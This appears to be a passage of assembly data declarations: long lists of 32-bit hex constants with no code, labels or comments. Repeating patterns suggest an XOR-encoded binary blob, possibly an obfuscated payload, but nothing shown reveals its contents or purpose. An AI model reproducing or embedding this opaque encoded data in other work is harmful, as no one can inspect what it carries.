dd 66EFDFCFh, 8DD46D5Bh, 8090A0B0h, 7DDCB16h, 0E4228B34h
dd 0FA2C757Dh, 0E63CA086h, 0EB3662F9h, 0E212E2B3h, 0AA046B05h
dd 0EF60C8B0h, 8CDB6070h, 0C49B205Ah, 0C0B8E09Ah, 0EA98A0B0h
dd 2A023130h, 95EF703Eh, 0C0E6DB26h, 0C05423E8h, 403F9018h
dd 6AC4AB30h, 0AA1C6BF0h, 0EA90CAF0h, 403A3272h, 7FD058h
dd 91D08AF0h, 7FC05FDAh, 766BBEE5h, 85497F30h, 0C754EF0Fh
dd 0D90A0B1h, 764060C5h, 0BEC9930h, 2F5BE0F0h, 6D110543h
dd 40667070h, 1428A5BDh, 202FE0C6h, 0A0FAF4E0h, 0D5AF9F1Ah
dd 261BD6h, 0B58F2075h, 81DD4884h, 51B86070h, 53102030h
dd 0A2B5A495h, 0F2C0C7C5h, 2C391619h, 754755h, 0C59E08A7h
dd 356FA0B0h, 40665F24h, 3B7AB5CFh, 3F87E0C6h, 0B6AB8E25h
dd 2A500A70h, 5E85DF32h, 79D0D6CBh, 8090A198h, 0C9B14BE7h
dd 5744043Ch, 0FB72750Fh, 76A3A086h, 7C6EC5F3h, 54102006h
dd 66451FA7h, 590968Bh, 63614B0h, 7214DEB3h, 0E4A41F1Eh
dd 0EA90CAB8h, 0DEC59F5Ah, 8510160Bh, 530C9430h, 80952658h
dd 0D1995370h, 85291AD3h, 0C0E6DCCEh, 0FC1192C5h, 33334454h
dd 28645342h, 0CE442171h, 0D4C0A0B0h, 10013620h, 95EF7360h
dd 0C0E6DBA6h, 0F4C96035h, 64249F7Fh, 3E95AF38h, 28D0D6CCh
dd 7F6F5D75h, 6EC59F23h, 0EB10160Bh, 0E814617Eh, 0D790A0B1h
dd 7B7EF58Fh, 95EF2006h, 0C0E6DBDEh, 7F6BC859h, 2A0A608Fh
dd 6A104A30h, 0A8D08AF0h, 8094A0B1h, 403AA4FBh, 8B1C4A60h
dd 96321F34h, 80A4FFC8h, 0A8995370h, 0FFEFDFEAh, 0D597757Dh
dd 0D1C2A086h, 0D5AF3021h, 261B02h, 3F02473h, 80C8F8E8h
dd 40504F80h, 102E6Fh, 0C0D0E0F1h, 8090A0B0h, 40506070h
dd 1008BBh, 0C0D0E0F0h, 7FC3F6E1h, 766B5AE5h, 0AC498B30h
dd 3BA52074h, 0D534E52h, 764911E5h, 95EF7230h, 0C0E6DB62h
dd 0BFC42539h, 56B86046h, 4C102030h, 0B5BB8F9Fh, 0E9E2F0C0h
dd 253C0906h, 61464557h, 81B5959Ch, 156FF0B0h, 40665B4Ah
dd 3F48A5B9h, 9C13E0C6h, 0E5E3C1F2h, 253D013Eh, 6A726F54h
dd 0B3A48395h, 0D3E4F6ECh, 40240315h, 7264535Ch, 0C0BE859Ch
dd 0E1F5D2F3h, 29160504h, 51455Ch, 0A1B592B3h, 0E9D6C5C4h
dd 211D051Ch, 6E795040h, 83D0A197h, 0F4F1C5C2h, 2F223015h
dd 73634553h, 0B293E0B1h, 0E5E4C1D5h, 2F3D0522h, 68444544h
dd 0A4B18582h, 0E5E2E3B0h, 14351411h, 61755258h, 0B293E094h
dd 0E5E4C1D5h, 2C3F0F24h, 707C4558h, 0AE83D2C3h, 0E8E3D0D1h
dd 550141Fh, 54644948h, 0A1B59298h, 0E9D6A0D4h, 2904051Ch
dd 6F44455Dh, 0B4A399A3h, 0E9C4CDD5h, 650051Dh, 4C754542h
dd 0A1A28299h, 0C790D9C2h, 29161415h, 7451455Ch, 0A2B99284h
dd 0F3F5D4C5h, 25176031h, 6C796644h, 0BAB9B395h, 0E5D7A0D5h
dd 2C392604h, 6D797455h, 0A597E095h, 0E4FFEDC4h, 8350C05h
dd 6C744E51h, 87D0A195h, 0E5C4D4D5h, 2916101Dh, 615E455Ch
dd 0C091859Dh, 0D4E4C5F7h, 10200D15h, 41785451h, 0B4B5A7F0h
dd 0F3E2C5E6h, 403E0F19h, 56644577h, 0A9A39295h, 0F8D5CEDFh
dd 25176031h, 6C7F7644h, 89B58D85h, 0F2FFC6DEh, 2924011Dh
dd 514E5Fh, 0A4B18FBCh, 0F2F2C9FCh, 1291211h, 70716D30h
dd 0B7B589A6h, 0E9D6C6FFh, 0F50051Ch, 467E4540h, 8DB58C99h
dd 0E9E0D0D1h, 4011071Eh, 6E75507Fh, 0A3BF92A0h, 80E3D3D5h
dd 233F1220h, 33635355h, 0B2B9A6C2h, 0D090D4C3h, 25330F02h
dd 32235343h, 0B4A885BEh, 0F4F5F3B0h, 253C0936h, 72645471h
dd 0B4A58299h, 80D1D3D5h, 6240523h, 54754C59h, 0C0B58D99h
dd 0E5F5CCE3h, 39036000h, 6D755443h, 0A5BD89A4h, 0E9D6CFE4h
dd 2904051Ch, 5510455Dh, 0B0B18D9Eh, 0F7F5C9E6h, 2916063Fh
dd 5610455Ch, 0B5A49299h, 0ECD1CCD1h, 40330F1Ch, 74795267h
dd 0ACB9A695h, 0F4DEA0D5h, 353A0431h, 72405443h, 0ACB99699h
dd 0F3F5C7D5h, 253B0F24h, 745E205Eh, 0A1B592B3h, 0E9D6C5C4h
dd 0E50051Ch, 65626344h, 90B59491h, 0E5F3CFC2h, 0E501303h
dd 65626344h, 90B59491h, 0E5F3CFC2h, 38151303h, 43646E30h
dd 0B4B18582h, 0E3F5F3D5h, 2E3F0904h, 43646E30h, 0B4B18582h
dd 0E5E3F5D5h, 2F223002h, 73634553h, 8DA4AEF0h, 0E9C6D0D1h
dd 261F1715h, 74734563h, 0C0BE8F99h, 0F0DFD4FEh, 29160E15h
dd 4E10455Ch, 0A5A0AF84h, 0EFE2F0DEh, 33230513h, 657B4F64h
dd 0B49EE09Eh, 0EEF5D0FFh, 34330523h, 7E4F59h, 0B28094BEh
dd 0E3F5D4DFh, 32393604h, 6C715544h, 0AFBD85BDh, 0CE90D9C2h
dd 25253104h, 6E595942h, 0ADA28F96h, 0EFF9D4D1h, 2B3F341Eh
dd 4E104E55h, 0A9A2B784h, 0E9C6C5C4h, 21251402h, 6D756D5Ch
dd 0C0A9929Fh, 0D5FCD4E2h, 2F33091Eh, 74434554h, 0A7BE8982h
dd 0EED1CFE4h, 34030903h, 677E4942h, 8183B7F0h, 0F2F1D4E3h
dd 40201504h, 737F4C53h, 0A3BF9395h, 80E4C5DBh, 2E3E0F13h
dd 644355h, 0A8A48597h, 0E2E4D3DFh, 2D310E09h, 65622055h
dd 0B3D09693h, 80F4CED5h, 2B330F03h, 49105455h, 0B2B5949Eh
dd 0C3E4C5DEh, 25230F1Ch, 647E4178h, 89D0859Ch, 0F2F5D4DEh
dd 724051Eh, 6F535455h, 0A3B58E9Eh, 0D3F4C5C4h, 25240104h
dd 747E6930h, 0A5BE9295h, 0E5E0EFC4h, 950211Eh, 7275545Eh
dd 8FA4859Eh, 0D5FEC5C0h
dd 40110C02h, 65644E79h, 0B4B58E82h, 0E4F1C5E2h, 253C0936h
dd 56546130h, 0F399B0B1h, 0CCD48E82h, 2502603Ch, 6F7C6357h
dd 0A59B8583h, 0E5C2A0C9h, 25202F17h, 79756B5Eh, 0C09198B5h
dd 0D1F7C5E2h, 39220505h, 757C4166h, 81A8A595h, 0E7F5F2B0h
dd 16240523h, 65654C51h, 0C09198B5h, 0EA6693E6h, 0CB063672h
dd 52114AE4h, 96C8920Fh, 0BFC8354Fh, 84DB6046h, 50467666h
dd 0D8A01FA6h, 0BB56354Fh, 84D36046h, 8D27E20h, 3B996DF0h
dd 0E8C1689Bh, 0A8506070h, 3346CBDh, 0C5BAE09Ah, 0EAC3F0E1h
dd 109CEB75h, 5440F4BBh, 9281A09Ah, 6E055FE3h, 0C350564Bh
dd 95EF2CF4h, 0C0E6DB06h, 43986433h, 7AACF5FDh, 0C9232006h
dd 0A882E09Ah, 80A2A080h, 1101A4FBh, 5140605Ah, 53F89Ah
dd 8EFAF4B8h, 0AAC59F20h, 8310160Bh, 12E3C034h, 199F6035h
dd 188A97B2h, 57D3E213h, 1381FC3h, 8F6F5F4Fh, 4050C5F4h
dd 0F0787030h, 4BD0E09Fh, 0B90CA64h, 28100ABCh, 2030h
dd 0AA82E29Ah, 0EF60C8B0h, 403A6070h, 0FF407361h, 0F6EB3E65h
dd 7FC9FFB0h, 766B4EE5h, 74EFA530h, 0BC5D6B81h, 639096A5h
dd 40C5ED7Ch, 3101620h, 3F83B721h, 4A152B62h, 0CD50564Bh
dd 37C1BFh, 3FFB08F0h, 51B5F4Fh, 40665B92h, 283EAFBDh
dd 0DA38E0F0h, 0B6F5F4Fh, 766BAEF5h, 359FAD30h, 28D0E0D8h
dd 7F6F5FB9h, 7B82E5FBh, 0C0952006h, 4F5DC084h, 809088F2h
dd 0BFAE9498h, 0DA95ABCFh, 45D0D6CBh, 0D9BD470h, 40782FFFh
dd 0FECFC830h, 75B1F0Fh, 68C563EFh, 40506070h, 10FDA16Dh
dd 0F3D0D6EBh, 14152D79h, 1150566Eh, 50417164h, 552FB1A1h
dd 80A69BEAh, 0BF7464F7h, 362B0EA5h, 0C412BDF0h, 8078F5B0h
dd 1D506070h, 1B2FCDB1h, 3FBAE0C6h, 9B9A353Dh, 12006046h
dd 3400FDh, 453E0DAh, 557C6BCh, 40667B20h, 85D700FDh, 0C0E6FBA2h
dd 80BAA094h, 5A3AA32Dh, 19C868h, 825DE0F0h, 496E0AD1h
dd 29939005h, 362C68A5h, 0C854E5F0h, 1519E2B8h, 40665C38h
dd 55D3C2C7h, 0C0D0E018h, 6D11FDB0h, 40667BE9h, 3C5CBDBBh
dd 0BC53E0C6h, 8F90A894h, 4050D9F4h, 8FCA130h, 94D0E0F2h
dd 8091A4D8h, 0C2C59F70h, 8B10160Bh, 0E4546D0Ch, 8090A1B4h
dd 0A8500A20h, 102034h, 0C082B2A6h, 0FE055FE7h, 7350564Bh
dd 487ADF9h, 91D0E0F1h, 0D192CAE1h, 4038611Ah, 52502030h
dd 0FB9A750Fh, 506A086h, 100B1486h, 1144864h, 3F87E0F0h
dd 82B08404h, 0D5AF6070h, 261C1Ah, 0B41065A9h, 0D08443A6h
dd 403AB4FBh, 56477162h, 0FB12750Fh, 5C9A086h, 168015B0h
dd 3B3EB5CFh, 975DE0C6h, 0EAC7F2F4h, 0D7DD3834h, 102134h
dd 0AA10D35Bh, 2B63F9A0h, 10003020h, 52407060h, 0FB82750Fh
dd 4411A086h, 40506278h, 83454CFh, 0FCCA750Fh, 7FC3A086h
dd 766C7AE5h, 4D27D30h, 0CAEE60F0h, 0BD6A1C5h, 764518FDh
dd 8D09C330h, 0F6C0E065h, 0D641A3B0h, 80D4B28Fh, 10FA83Fh
dd 44DFE0F0h, 8090A1A0h, 356A5EF0h, 3E906620h, 0C154EFF0h
dd 90A0B1h, 0B125404Eh, 502EA176h, 0B597AEB9h, 465F2BF2h
dd 6B1F6136h, 7A71FEh, 3F83B6A1h, 0B6ACB225h, 816B3970h
dd 0CFA53Fh, 455DE0F0h, 80A6BE38h, 4C38601Ah, 50102030h
dd 0D2451FA3h, 0BD90968Ch, 4050607Ch, 0AFA53Fh, 7139E0F0h
dd 190A0B0h, 902304Eh, 0A5952F66h, 43D0E0F0h, 0BC3CA876h
dd 0D9D46F7Dh, 3C102030h, 6C2395D0h, 59F9A8Ch, 405060FCh
dd 20302D9Dh, 0E1EDC0D0h, 0F5E4C5D7h, 606CCC0Fh, 7E915C45h
dd 0B4B8C00Fh, 1E1D5C4h, 7A20630Eh, 68650F1Fh, 0C02FA736h
dd 902A91BFh, 0B7506057h, 95EF72D2h, 0C0E6DB42h, 0D0C06083h
dd 49B83020h, 44102030h, 0ACBE979Fh, 80F4C1DFh, 7C72F58Fh
dd 0C0952006h, 9E3D684h, 0BCDC2539h, 28016046h, 80102230h
dd 9086B1A1h, 0BCB6354Fh, 0D5DD6046h, 263BA3h, 9419D3A0h
dd 0D1C2F0E1h, 1AC59F21h, 8710160Bh, 552FC4F4h, 80A69B9Eh
dd 0CDD0A388h, 26355Bh, 0AA1319F1h, 7F91CAB1h, 44239F43h
dd 0C09535CFh, 1BE3BA84h, 8B23703Bh, 0CD6C3073h, 360D9785h
dd 0CC6A6BF0h, 0B90A0B1h, 405168FAh, 2BE82330h, 0B5B803Bh
dd 0F4F10643h, 0B5B22775h, 0C7930EDBh, 0C5BB3FFh, 0D0442BE7h
dd 11100A24h, 0FFEF4A62h, 0F6EB0E65h, 0E21D2BB0h, 0C350564Bh
dd 0CF3B2CF4h, 7D70973h, 6890CAB7h, 431FE970h, 465F73F3h
dd 9291B7A4h, 0E9DDFCF5h, 333F1213h, 5C64465Fh, 0A4BE89A7h
dd 0DCE3D7DFh, 32221533h, 56644E55h, 0A9A39295h, 0C5CCCEDFh
dd 2F3C1008h, 624542h, 0A7A281A4h, 0EFD8D4D5h, 42501403h
dd 402030h, 0A9D0E0F0h, 0AEF4C3C2h, 2635090Ah, 7C501Eh
dd 8B93A9BEh, 0EEEAD390h, 33251214h, 53452A5Ch, 0ABF0B2B5h
dd 0CED9EFFAh, 29264650h, 0A655442h, 0C0D008A5h, 1CDA0B0h
dd 764EFA9Dh, 6B95E630h, 0C0D0D6E5h, 0BB16354Fh, 0A8916046h
dd 6A2C542Fh, 0FE656BEEh, 0D990968Bh, 357E5CDCh, 3E91461Ah
dd 0E3A5FD0Fh, 0BCD21D3Dh, 36DB6046h, 66B57732h, 77556D55h
dd 0F909687h, 7667BDF5h, 4699DA30h, 3E9E6C0Ah, 6291114Bh
dd 0A8008BBFh, 0FFEFDB18h, 0C8F49C73h, 68D4D5B4h, 40506078h
dd 2E536663h, 0C09CACB4h, 0BB02354Fh, 805B6046h, 6A832D44h
dd 552FB3F2h, 80A69B8Ah, 0A8C3B08Fh, 0FFEFDEAEh, 0C0D0EB18h
dd 0C3D6F3B0h, 6E032F2Fh, 5C6C74h, 0FB42750Fh, 378A086h
dd 0A8AF9F8Eh, 0FFEFD639h, 0D2026D0Fh, 49A3A086h, 7FBCE5FDh
dd 51412006h, 9180B1A1h, 156FF1E1h, 40665BFEh, 102BD8h
dd 8583B5F0h, 0AEA293E2h, 401C2C34h, 3B82B5CFh, 0CA38E0C6h
dd 0F790A0B0h, 29221003h, 4176545Eh, 552FB0F0h, 80A69B8Ah
dd 7B12E5F9h, 311F2006h, 0D9A16D7Dh, 519A086h, 40665C38h
dd 9285DF61h, 53D0D6CBh, 8090A4D8h, 3EE5ED70h, 59101629h
dd 0FCFE5D7Dh, 4978A086h, 26AF9F85h, 1E71A5F7h, 90D0E0C6h
dd 9EF30533h, 0CD506046h, 360E01A5h, 0AA84B0F0h, 0D290CAB1h
dd 40506218h, 3285DFB0h, 45D0D6CCh, 0A2E5FA70h, 5E04EDFDh
dd 6A422006h, 0A1656DF6h, 0D49096AEh, 11003026h, 3685DF62h
dd 98D0D6CCh, 0BCBE354Fh, 0C5966046h, 261E7Fh, 0C0DC08F0h
dd 0D3C7A0B0h, 731B233Fh, 4C540E02h, 552FE0BCh, 80A69B22h
dd 405708E3h, 0B59D2030h, 0C0E6F825h, 7E2D2DE9h, 0A850564Bh
dd 0FFEFD574h, 0C0D0EC18h, 0CED9F7B0h, 14152E39h, 4C5C641Eh
dd 52451FF0h, 590968Bh, 75D46FB0h, 93102032h, 0C0D0E598h
dd 93252DB0h, 19505669h, 3C0A9DBDh, 0CD38E0C6h, 36F5F45h
dd 766C7ECDh, 841F2030h, 0C0D0E2E0h, 81004C31h, 28046070h
dd 102131h, 0FB2E750Fh, 4411A086h, 405061E0h, 6AC4AB60h
dd 552FB2F0h, 80A69CAEh, 3509A0F5h, 1398483Dh, 552FE0F0h
dd 80A69B02h, 0FDD3829Bh, 263E53h, 4DF995F0h, 0B68EC735h
dd 0D5AF3070h, 261C3Ah, 44DF2075h, 8090A139h, 0CB5C20FBh
dd 8F20DF30h, 0F6CE8375h, 0CF1566B0h, 4150564Eh, 17A205Ah
dd 552FE29Ah, 80A69CA6h, 4FAF98F3h, 1140B4h, 555D73F0h
dd 80A6BEEFh, 1302701Ah, 3C16B5CFh, 55E0C6h, 81D025BFh
dd 0FDDD6070h, 263E49h, 8338E841h, 0E86F5F4Ah, 405060E4h
dd 89F60B6Eh, 3F84C4C4h, 0B6AB2A25h, 0C7EDED70h, 0B110162Eh
dd 3AF408F1h, 151D5F4Fh, 40667E04h, 1478205Ah, 92D0E0F0h
dd 92055FE3h
dd 0CD50564Ch, 8D040474h, 0F6EF0C65h, 369FF0B0h, 6414EB7Ah
dd 8F0E124h, 0D2D1AAF2h, 0CA82A2FAh, 64146B73h, 0FF1A038h
dd 91D80031h, 90B4E4BBh, 0CD00528Fh, 362C708Dh, 0C0CC08F0h
dd 0AEB5A0B0h, 6E701846h, 3A300E10h, 0EEF5C5D5h, 0F8B5D888h
dd 4A234550h, 4E596F7Ah, 3F87E0D0h, 0B6ABE225h, 0EC94E170h
dd 6A102030h, 9387B0F0h, 0BC82354Fh, 0CDDB6046h, 2635B4h
dd 0DB33E09Ah, 0D19D69DBh, 40506598h, 64350630h, 3F87E0FAh
dd 0B6ABE225h, 4C94E370h, 681BCB60h, 0C0D0E0F7h, 9E1D1D3Dh
dd 13076046h, 3C02B5CFh, 55E0C6h, 351DF4CEh, 40665C20h
dd 159485B3h, 4DD0E0C6h, 0B6AEEF3Dh, 2A9E4B70h, 53467130h
dd 0FCDE750Fh, 7813A086h, 0D17F1E70h, 0B59DDEBBh, 0C0E6DCA0h
dd 2E62AD00h, 0A8307005h, 0FFEFDA01h, 23C79291h, 81E72DB9h
dd 8FDB8A9Bh, 0BD9DEE1Bh, 0C0E6DCA0h, 77170443h, 0BF03D99Bh
dd 362C22A5h, 0AB6D60F0h, 819096A5h, 70384A04h, 0FF102045h
dd 0F6EB5265h, 0CF2D20B0h, 4050564Eh, 85D73144h, 0C0E6FE93h
dd 8090A0B0h, 7E1FE5B6h, 0E9102006h, 3F2F1EF8h, 95E42577h
dd 40506046h, 0C24DA030h, 0CADDE0F4h, 0EFFE80FFh, 2F700E1Fh
dd 697C0056h, 0E0F18596h, 0E9E480FFh, 3470051Dh, 6573005Fh
dd 0B2B2859Ch, 0A1F5D4D1h, 60706A7Dh, 4F300010h, 0ADA593D0h
dd 0A0E2C5DDh, 24220117h, 0D314E55h, 0ACB5B2FAh, 0ECE4CED5h
dd 2C231315h, 61780049h, 0E0A99080h, 0A0F4CED1h, 25201815h
dd 6E715453h, 0B3F0CC84h, 0E4FEC1C4h, 7A370E19h, 0A1D0D10h
dd 0A3A481A7h, 0E7FEC9D8h, 2C3C0150h, 79714410h, 0A4BE81D0h
dd 0E7F9CE90h, 607C1418h, 20624F56h, 0A5B99296h, 0A0E3C4DEh
dd 21274039h, 0D2A5459h, 0A5B8B7FAh, 0E1B0C5C2h, 39700502h
dd 203C555Fh, 0A5B99296h, 0BFE3C4DEh, 2D3F2350h, 49300155h
dd 0B3B9C084h, 0EDF9D490h, 9704115h, 20630744h, 0A5A4819Ch
dd 4714A491h, 0E6444940h, 0B1EAC520h, 0D91939D7h, 8BEA1457h
dd 509E75h, 0B611B28Dh, 0D96063BAh, 8090A01Ah, 40506070h
dd 102030h, 0C0D0E0F0h, 8090A0B0h, 40506070h, 102030h
dd 0C0D0E0F0h, 8090A0B0h, 40506070h, 102030h, 0C0D0E0F0h
dd 8090A0B0h, 40506070h, 102030h, 0C0D0E0F0h, 8090A0B0h
dd 40506070h, 102030h, 0C0D0E0F0h, 8090A0B0h, 40506070h
dd 102030h, 0C0D0E0F0h, 2513C0B0h, 40665FCCh, 0C0B5A330h
dd 0C0D0D6CFh, 94D317BFh, 4F4833FDh, 3166B87h, 0E4946B20h
dd 8CD28B94h, 26B7902h, 8B045338h, 82FBF4B2h, 3C0529BCh
dd 0C950564Fh, 362FE0B5h, 43D50BF0h, 59728872h, 4054A211h
dd 245CA5B8h, 0A438E0C6h, 0E890A0B0h, 4050606Fh, 2369A5BDh
dd 0F989E0C6h, 39CD4A8h, 0B7B264B0h, 3F8CA5CFh, 3713E0C6h
dd 0CC1DA369h, 0A3505654h, 0FC60DF20h, 2853E07Fh, 96642B4h
dd 767319EDh, 2AA330h, 0F2FBE584h, 0D80D2B3h, 1B089C3Eh
dd 2AA36Eh, 0F22FE484h, 0F26FA35Bh, 0BF078860h, 0CE3BDFCFh
dd 0FF106DDBh, 83C8A086h, 0CF93543Bh, 362F80B5h, 5C5527F0h
dd 8090968Fh, 0A8506070h, 10200Ch, 0FF4C657Bh, 3078A086h
dd 0A8AF9F86h, 102028h, 0FF4C5D73h, 0F590A086h, 0B5CDE978h
dd 0EB101613h, 5C5D1F6Ch, 4390968Fh, 7FF0E5FFh, 95992006h
dd 0C0E6DF6Ch, 8090A358h, 83995370h, 90B3BBh, 2882E0F0h
dd 7F6F5E5Dh, 7F90F573h, 0D6132006h, 0C0DC9A73h, 819724BFh
dd 3AD36070h, 841F2020h, 0C0D0E00Dh, 0D09CE23Bh, 0BFAEA898h
dd 0C09523CFh, 0C3D0D6CFh, 881AF076h, 345099F0h, 2EE9A029h
dd 2B90E384h, 81D82B41h, 9F8F81F1h, 0F991FFEFh, 0C09CACB4h
dd 0ABC94CC5h, 0BAA9E3B8h, 0A7AF3Fh, 41B6E0F0h, 0B2A35EC8h
dd 40FBE57Fh, 83462030h, 0C5A5E0CAh, 6B80EA3Bh, 435AEB72h
dd 72F871C1h, 0C32F1F0Eh, 0B6AF6005h, 80D5CD70h, 841FDB48h
dd 0C0D0E074h, 0BF50154Fh, 0A8006046h, 0FFEFDE65h, 0FF1065F3h
dd 51FA086h, 40665FB0h, 53342433h, 0F3D22073h, 8826AF6Bh
dd 89D07293h, 24D17310h, 0DCF9E4D4h, 0A49C8994h, 0A9BB202Bh
dd 0D71FDBB1h, 0FEA43D4Bh, 0C5385B31h, 7624BB1Eh, 3B49DBB1h
dd 0EEA41F51h, 0A2465B31h, 6624CCC5h, 0E983DBB1h, 0DEA413A8h
dd 69ED5B31h, 56249328h, 3F56DBB1h, 0CEA401D5h, 0BFA05B31h
dd 46248155h, 3FB0B5CFh, 298BE0C6h, 7F6F5FC1h, 5492E32Eh
dd 0FFEECFD9h, 0AAD1230Fh, 0D078F8B4h, 0C8AF9F85h, 363606A5h
dd 0F16886F0h, 4072A2A8h, 0A2526394h, 67A8B56h, 35E508A8h
dd 42135F4Fh, 2A81E778h, 28F87835h, 402F1F05h, 8BE3A34Ah
dd 0C55230C0h, 260616h, 0AAF70B5Ah, 3AF8D8h, 5825638Ah
dd 8F83180h, 782F1F05h, 8090A0B1h, 4D24B2F4h, 0CAEEC0E1h
dd 0C53B161Bh, 8090A008h, 0FFB2CBF0h, 9885ADF3h, 0EBD0D6C8h
dd 434A5767h, 78DBE587h, 102006h, 55DFE8F0h, 8B706170h
dd 78D9E586h, 75112006h, 49DD86F6h, 76834B95h, 7668E9F5h
dd 6652230h, 0E5E1ED96h, 8DF6A45Bh, 0EB364571h, 0FFEF9CD8h
dd 0F4936B0Fh, 0BF243539h, 83FB6046h, 389BA5C7h, 0C0D0E0C6h
dd 159FA8B0h, 0EAEC64B0h, 0FFEFBCD8h, 7845690Fh, 7690968Fh
dd 7668E9F5h, 4652130h, 0C23BD1FFh, 433B609Bh, 78DBE587h
dd 102006h, 0E7A4E8F0h, 0B815253Ah, 0A0916046h, 8B1D463Bh
dd 707B86B5h, 51A0A48h, 406658F5h, 50BC0F1h, 0C6598497h
dd 0E650931Bh, 0F8428BDBh, 15AF54h, 45556A5Bh, 84909688h
dd 58B0A128h, 0FCA0E39Bh, 78B6C01Bh, 2BF6A05Bh, 443A799Bh
dd 0F409C868h, 0C45D1F0Fh, 88706162h, 80D96516h, 3FB8B56h
dd 0AA7A7040h, 8078F8B2h, 0C4AF9F84h, 6A2254E2h, 3438B8F8h
dd 7E6F5F43h, 349312BAh, 74DADEF5h, 0B41A1E39h, 0F45A5E6Bh
dd 349A9E7Ch, 74DADE3Ch, 2B2950FCh, 6B6D107Dh, 0ABA5D0B9h
dd 0EBE890F5h, 7D5D2331h, 80A69828h, 78DBE587h, 102006h
dd 0C3A460F0h, 773AC000h, 7668EBF5h, 102030h, 78D794F8h
dd 807C2BE5h, 0C5A72FDBh, 2618BBh, 0C1D0E0F3h, 804724BFh
dd 0A8E06070h, 0BD998B9Ah, 0C0E6DF54h, 2B3A4800h, 7FF8DDF9h
dd 85E72006h, 0C0E6D87Bh, 8090A0B3h, 0C5A77504h, 2618BBh
dd 0C1D0E0F0h, 4178A5C4h, 0F0AF9F8Eh, 8BBB8AD9h, 0F6EF4475h
dd 0AB5F2BB0h, 0ECEDE9B8h, 8910160Fh, 0A7681CB8h, 2BA65FD4h
dd 0EB36A043h, 389BA5C7h, 0C0D3E0C6h, 8EE4A0B0h, 78D9E586h
dd 74902006h, 3E9208F5h, 0E7285F4Fh, 0EB76E914h, 0AB76E003h
dd 0F85B6507h, 8093A086h, 15246070h, 3899A5C6h, 0B550E0C6h
dd 7E8E48B5h, 0E4B89F8Fh, 0B0EFDFCDh, 3B6608D0h, 0B9735F4Fh
dd 55AFD816h, 0AB818B56h, 0F85B757Bh, 5267A086h, 4053A287h
dd 14652030h, 3F2D9E18h, 688F104Fh, 0BFAF9BE0h, 15EF9856h
dd 6B414B96h, 51B6F3Bh, 40665FDCh, 4899E81Bh, 4B55170Ch
dd 83909688h, 34506070h, 8B95D71Eh, 0C0D0D6C8h, 0F496A0B0h
dd 0CBD59752h, 101608h, 0B5D1E0F0h, 7D6248B5h, 0C5A79F8Fh
dd 2618BBh, 0C4D0E0F0h, 8D78A5C4h, 0B7AF9F8Eh, 3628ABB5h
dd 0C0D0E4F0h, 6887D4B0h, 0BFAF9E17h, 0FED00988h, 0C8684B38h
dd 2B94D470h, 0ABA815C8h, 85E78B57h, 0C0E6D87Bh, 8090A0B8h
dd 0FDD02F05h, 2618B9h, 289694F0h, 7F6F5E8Bh, 694849C8h
dd 85B52AF9h, 0D0D6C8h, 259AA354h, 406658F5h, 0AAA1909Bh
dd 0F859657Ah, 303AA086h
dd 0C5D56A30h, 0AA101608h, 3D325896h, 0B81B2547h, 40406046h
dd 7642030h, 0A67AA940h, 0E66CD508h, 0EAB8D0DBh, 89BBE003h
dd 0F6EF704Dh, 0B1557B0h, 60505648h, 75102030h, 0CA8850F9h
dd 0B6A82335h, 0F836CA70h, 85E7E0B1h, 0C0E6D87Bh, 8090A0F0h
dd 84D06304h, 83B52A18h, 0A6D0D6C8h, 142D291Bh, 0EB50564Fh
dd 389BA5C7h, 0C0D0E0C6h, 89E5E0B0h, 0C55230C0h, 2618B3h
dd 4B55175Ah, 909688h, 35506070h, 0AA8903Bh, 0F6E86475h
dd 0BD7B0AB0h, 5861D816h, 389BA5C7h, 0C1D0E0C6h, 82E4A0B0h
dd 0E55A49C0h, 2618B4h, 0CAD30430h, 0B6A82415h, 26FB0670h
dd 0F7E0A188h, 0F6E86B75h, 8092A0B0h, 0F4521570h, 84B52AF8h
dd 0A6D0D6C8h, 302D291Bh, 0F850564Fh, 1008A8h, 4B55175Bh
dd 88909688h, 34506070h, 0FD21C841h, 45271F0Fh, 80A6983Bh
dd 40506470h, 0B8A02B45h, 0F85565FAh, 6B3AA086h, 0CBD5973Dh
dd 101608h, 0B5D0E0F8h, 328C6A1h, 0C5F56A90h, 66101608h
dd 6A10D35Bh, 38F6B55Bh, 0E55A7859h, 2618B5h, 0CAD30430h
dd 0B6A82515h, 0B7FB0670h, 3628ABB5h, 0C0C0E0F0h, 128C6B0h
dd 0C05314B0h, 0A51A28F4h, 0C0E6D875h, 369F0BD6h, 7668E9F5h
dd 0C0F88B30h, 372F1F0Ch, 0B6A82B35h, 40506070h, 0B0195470h
dd 4355E2A0h, 2A909688h, 78DBE587h, 20102006h, 4660E0F0h
dd 8494A2C5h, 0CAAE2FFDh, 3628A395h, 585D69F0h, 0E690968Fh
dd 45ACE0DBh, 0A02745h, 802FAF70h, 7CE9481Ah, 0C5A79F8Fh
dd 2618BBh, 0C0D0A0F0h, 0B1F618D6h, 69E46205h, 18A08B56h
dd 0F85565FAh, 6050A086h, 14B8CA73h, 0B0EFDFCCh, 4B551778h
dd 80909688h, 355060F0h, 8A969032h, 0F6E86355h, 3BC6B0h
dd 4725658Ch, 4F902080h, 287AA00Fh, 7F6F5C9Bh, 78DBE587h
dd 102006h, 0CBA5E0F1h, 59AE000h, 406658F3h, 661FCB9Ah
dd 0CA106348h, 0B6A82315h, 0F0FB0670h, 85E78A31h, 0C0E6D87Bh
dd 8092A0B0h, 0C5A74F05h, 2618BBh, 0C0D4E0F0h, 4020BAC5h
dd 78D5E57Ah, 0A59A2006h, 0C0E6D87Ah, 0E6804071h, 0EBD106C8h
dd 8FB2080h, 45DAA040h, 80A69835h, 0CBD597DAh, 101608h
dd 0B5D0E8F0h, 328C6A0h, 0C4F56A98h, 66101608h, 2BD1505Bh
dd 8AD810B8h, 7668E4F5h, 85E78A30h, 0C0E6D87Bh, 8080A0B0h
dd 652515C1h, 0F8939856h, 0F85445FAh, 2BF6A086h, 69FAA043h
dd 362FB88Dh, 4B5517F0h, 80909688h, 35504070h, 0EB67912Fh
dd 0C96886EBh, 435AAA8h, 80505648h, 0A51A23D4h, 0C0E6D874h
dd 3DB90BD6h, 40665FE8h, 0A59AE1BAh, 0C0E6DF68h, 0D8200BD6h
dd 78D3E572h, 0F7BA2006h, 0F6E86B75h, 8090A3B0h, 0B7721471h
dd 3628ABB5h, 0C0D0E0F0h, 7786D5B4h, 7668EBF5h, 102030h
dd 28D595F3h, 7F6F5A34h, 0BFAACB98h, 8B95D7CFh, 0C0D0D6C8h
dd 0F498A0B0h, 0EA99D073h, 389BA5C7h, 0C0D0E0C6h, 0A0E420B0h
